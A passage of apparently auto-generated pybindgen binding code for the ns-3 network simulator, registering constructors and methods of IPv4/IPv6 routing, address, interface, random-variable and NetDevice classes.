visibility='protected', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::GetIpForward() const [member function]
cls.add_method('GetIpForward',
'bool',
[],
is_const=True, visibility='private', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::GetWeakEsModel() const [member function]
cls.add_method('GetWeakEsModel',
'bool',
[],
is_const=True, visibility='private', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetIpForward(bool forward) [member function]
cls.add_method('SetIpForward',
'void',
[param('bool', 'forward')],
visibility='private', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetWeakEsModel(bool model) [member function]
cls.add_method('SetWeakEsModel',
'void',
[param('bool', 'model')],
visibility='private', is_virtual=True)
return
def register_Ns3Ipv4MaskChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')])
return
def register_Ns3Ipv4MaskValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Mask',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Mask const &', 'value')])
return
def register_Ns3Ipv4MulticastRoute_methods(root_module, cls):
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::Ipv4MulticastRoute(ns3::Ipv4MulticastRoute const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MulticastRoute const &', 'arg0')])
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::Ipv4MulticastRoute() [constructor]
cls.add_constructor([])
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4MulticastRoute::GetGroup() const [member function]
cls.add_method('GetGroup',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4MulticastRoute::GetOrigin() const [member function]
cls.add_method('GetOrigin',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): uint32_t ns3::Ipv4MulticastRoute::GetOutputTtl(uint32_t oif) [member function]
cls.add_method('GetOutputTtl',
'uint32_t',
[param('uint32_t', 'oif')],
deprecated=True)
## ipv4-route.h (module 'internet'): std::map<unsigned int, unsigned int, std::less<unsigned int>, std::allocator<std::pair<unsigned int const, unsigned int> > > ns3::Ipv4MulticastRoute::GetOutputTtlMap() const [member function]
cls.add_method('GetOutputTtlMap',
'std::map< unsigned int, unsigned int >',
[],
is_const=True)
## ipv4-route.h (module 'internet'): uint32_t ns3::Ipv4MulticastRoute::GetParent() const [member function]
cls.add_method('GetParent',
'uint32_t',
[],
is_const=True)
## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetGroup(ns3::Ipv4Address const group) [member function]
cls.add_method('SetGroup',
'void',
[param('ns3::Ipv4Address const', 'group')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetOrigin(ns3::Ipv4Address const origin) [member function]
cls.add_method('SetOrigin',
'void',
[param('ns3::Ipv4Address const', 'origin')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetOutputTtl(uint32_t oif, uint32_t ttl) [member function]
cls.add_method('SetOutputTtl',
'void',
[param('uint32_t', 'oif'), param('uint32_t', 'ttl')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetParent(uint32_t iif) [member function]
cls.add_method('SetParent',
'void',
[param('uint32_t', 'iif')])
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::MAX_INTERFACES [variable]
cls.add_static_attribute('MAX_INTERFACES', 'uint32_t const', is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::MAX_TTL [variable]
cls.add_static_attribute('MAX_TTL', 'uint32_t const', is_const=True)
return
def register_Ns3Ipv4Route_methods(root_module, cls):
cls.add_output_stream_operator()
## ipv4-route.h (module 'internet'): ns3::Ipv4Route::Ipv4Route(ns3::Ipv4Route const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Route const &', 'arg0')])
## ipv4-route.h (module 'internet'): ns3::Ipv4Route::Ipv4Route() [constructor]
cls.add_constructor([])
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetDestination() const [member function]
cls.add_method('GetDestination',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetGateway() const [member function]
cls.add_method('GetGateway',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4Route::GetOutputDevice() const [member function]
cls.add_method('GetOutputDevice',
'ns3::Ptr< ns3::NetDevice >',
[],
is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetSource() const [member function]
cls.add_method('GetSource',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetDestination(ns3::Ipv4Address dest) [member function]
cls.add_method('SetDestination',
'void',
[param('ns3::Ipv4Address', 'dest')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetGateway(ns3::Ipv4Address gw) [member function]
cls.add_method('SetGateway',
'void',
[param('ns3::Ipv4Address', 'gw')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetOutputDevice(ns3::Ptr<ns3::NetDevice> outputDevice) [member function]
cls.add_method('SetOutputDevice',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'outputDevice')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetSource(ns3::Ipv4Address src) [member function]
cls.add_method('SetSource',
'void',
[param('ns3::Ipv4Address', 'src')])
return
def register_Ns3Ipv4RoutingProtocol_methods(root_module, cls):
## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol::Ipv4RoutingProtocol() [constructor]
cls.add_constructor([])
## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol::Ipv4RoutingProtocol(ns3::Ipv4RoutingProtocol const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4RoutingProtocol const &', 'arg0')])
## ipv4-routing-protocol.h (module 'internet'): static ns3::TypeId ns3::Ipv4RoutingProtocol::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('NotifyAddAddress',
'void',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyInterfaceDown(uint32_t interface) [member function]
cls.add_method('NotifyInterfaceDown',
'void',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyInterfaceUp(uint32_t interface) [member function]
cls.add_method('NotifyInterfaceUp',
'void',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('NotifyRemoveAddress',
'void',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('PrintRoutingTable',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): bool ns3::Ipv4RoutingProtocol::RouteInput(ns3::Ptr<ns3::Packet const> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void, ns3::Ptr<ns3::Ipv4Route>, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void, ns3::Ptr<ns3::Packet const>, ns3::Ipv4Header const&, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ecb) [member function]
cls.add_method('RouteInput',
'bool',
[param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4Route> ns3::Ipv4RoutingProtocol::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function]
cls.add_method('RouteOutput',
'ns3::Ptr< ns3::Ipv4Route >',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function]
cls.add_method('SetIpv4',
'void',
[param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3Ipv6AddressChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv6AddressValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Address const &', 'value')])
return
def register_Ns3Ipv6Interface_methods(root_module, cls):
## ipv6-interface.h (module 'internet'): ns3::Ipv6Interface::Ipv6Interface(ns3::Ipv6Interface const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Interface const &', 'arg0')])
## ipv6-interface.h (module 'internet'): ns3::Ipv6Interface::Ipv6Interface() [constructor]
cls.add_constructor([])
## ipv6-interface.h (module 'internet'): bool ns3::Ipv6Interface::AddAddress(ns3::Ipv6InterfaceAddress iface) [member function]
cls.add_method('AddAddress',
'bool',
[param('ns3::Ipv6InterfaceAddress', 'iface')])
## ipv6-interface.h (module 'internet'): ns3::Ipv6InterfaceAddress ns3::Ipv6Interface::GetAddress(uint32_t index) const [member function]
cls.add_method('GetAddress',
'ns3::Ipv6InterfaceAddress',
[param('uint32_t', 'index')],
is_const=True)
## ipv6-interface.h (module 'internet'): ns3::Ipv6InterfaceAddress ns3::Ipv6Interface::GetAddressMatchingDestination(ns3::Ipv6Address dst) [member function]
cls.add_method('GetAddressMatchingDestination',
'ns3::Ipv6InterfaceAddress',
[param('ns3::Ipv6Address', 'dst')])
## ipv6-interface.h (module 'internet'): uint16_t ns3::Ipv6Interface::GetBaseReachableTime() const [member function]
cls.add_method('GetBaseReachableTime',
'uint16_t',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): uint8_t ns3::Ipv6Interface::GetCurHopLimit() const [member function]
cls.add_method('GetCurHopLimit',
'uint8_t',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv6Interface::GetDevice() const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[],
is_const=True, is_virtual=True)
## ipv6-interface.h (module 'internet'): ns3::Ipv6InterfaceAddress ns3::Ipv6Interface::GetLinkLocalAddress() const [member function]
cls.add_method('GetLinkLocalAddress',
'ns3::Ipv6InterfaceAddress',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): uint16_t ns3::Ipv6Interface::GetMetric() const [member function]
cls.add_method('GetMetric',
'uint16_t',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): uint32_t ns3::Ipv6Interface::GetNAddresses() const [member function]
cls.add_method('GetNAddresses',
'uint32_t',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): uint16_t ns3::Ipv6Interface::GetReachableTime() const [member function]
cls.add_method('GetReachableTime',
'uint16_t',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): uint16_t ns3::Ipv6Interface::GetRetransTimer() const [member function]
cls.add_method('GetRetransTimer',
'uint16_t',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): static ns3::TypeId ns3::Ipv6Interface::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv6-interface.h (module 'internet'): bool ns3::Ipv6Interface::IsDown() const [member function]
cls.add_method('IsDown',
'bool',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): bool ns3::Ipv6Interface::IsForwarding() const [member function]
cls.add_method('IsForwarding',
'bool',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): bool ns3::Ipv6Interface::IsUp() const [member function]
cls.add_method('IsUp',
'bool',
[],
is_const=True)
## ipv6-interface.h (module 'internet'): ns3::Ipv6InterfaceAddress ns3::Ipv6Interface::RemoveAddress(uint32_t index) [member function]
cls.add_method('RemoveAddress',
'ns3::Ipv6InterfaceAddress',
[param('uint32_t', 'index')])
## ipv6-interface.h (module 'internet'): ns3::Ipv6InterfaceAddress ns3::Ipv6Interface::RemoveAddress(ns3::Ipv6Address address) [member function]
cls.add_method('RemoveAddress',
'ns3::Ipv6InterfaceAddress',
[param('ns3::Ipv6Address', 'address')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::Send(ns3::Ptr<ns3::Packet> p, ns3::Ipv6Address dest) [member function]
cls.add_method('Send',
'void',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv6Address', 'dest')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetBaseReachableTime(uint16_t baseReachableTime) [member function]
cls.add_method('SetBaseReachableTime',
'void',
[param('uint16_t', 'baseReachableTime')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetCurHopLimit(uint8_t curHopLimit) [member function]
cls.add_method('SetCurHopLimit',
'void',
[param('uint8_t', 'curHopLimit')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('SetDevice',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetDown() [member function]
cls.add_method('SetDown',
'void',
[])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetForwarding(bool forward) [member function]
cls.add_method('SetForwarding',
'void',
[param('bool', 'forward')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetMetric(uint16_t metric) [member function]
cls.add_method('SetMetric',
'void',
[param('uint16_t', 'metric')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetNsDadUid(ns3::Ipv6Address address, uint32_t uid) [member function]
cls.add_method('SetNsDadUid',
'void',
[param('ns3::Ipv6Address', 'address'), param('uint32_t', 'uid')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetReachableTime(uint16_t reachableTime) [member function]
cls.add_method('SetReachableTime',
'void',
[param('uint16_t', 'reachableTime')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetRetransTimer(uint16_t retransTimer) [member function]
cls.add_method('SetRetransTimer',
'void',
[param('uint16_t', 'retransTimer')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetState(ns3::Ipv6Address address, ns3::Ipv6InterfaceAddress::State_e state) [member function]
cls.add_method('SetState',
'void',
[param('ns3::Ipv6Address', 'address'), param('ns3::Ipv6InterfaceAddress::State_e', 'state')])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::SetUp() [member function]
cls.add_method('SetUp',
'void',
[])
## ipv6-interface.h (module 'internet'): void ns3::Ipv6Interface::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3Ipv6PrefixChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')])
return
def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Prefix',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Prefix const &', 'value')])
return
def register_Ns3LogNormalRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::LogNormalRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable::LogNormalRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetMu() const [member function]
cls.add_method('GetMu',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetSigma() const [member function]
cls.add_method('GetSigma',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue(double mu, double sigma) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mu'), param('double', 'sigma')])
## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger(uint32_t mu, uint32_t sigma) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mu'), param('uint32_t', 'sigma')])
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3NetDevice_methods(root_module, cls):
## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor]
cls.add_constructor([])
## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDevice const &', 'arg0')])
## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): static ns3::TypeId ns3::NetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
